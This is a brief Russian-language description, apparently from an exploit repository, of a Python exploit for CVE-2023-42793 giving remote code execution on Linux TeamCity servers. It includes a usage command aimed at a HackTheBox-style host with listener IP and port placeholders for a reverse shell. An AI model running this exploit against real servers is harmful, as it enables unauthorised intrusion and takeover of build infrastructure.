
Python-эксплойт для CVE-2023-42793, обеспечивающий удалённое выполнение кода на серверах TeamCity под Linux путём кодирования полезной нагрузки в URL и отправки её на цель.
Сначала вам нужно получить токен, используя другой эксплойт. Однако следующий эксплойт позволит вам получить RCE на Linux-сервере, так как он кодирует полезную нагрузку в URL и отправляет её на сервер.
python3 ./main -t TEAMCITY_TOKEN -u http://teamcity.runner.htb -p 80 -ni LISTENER_IP -np LISTENER_PORT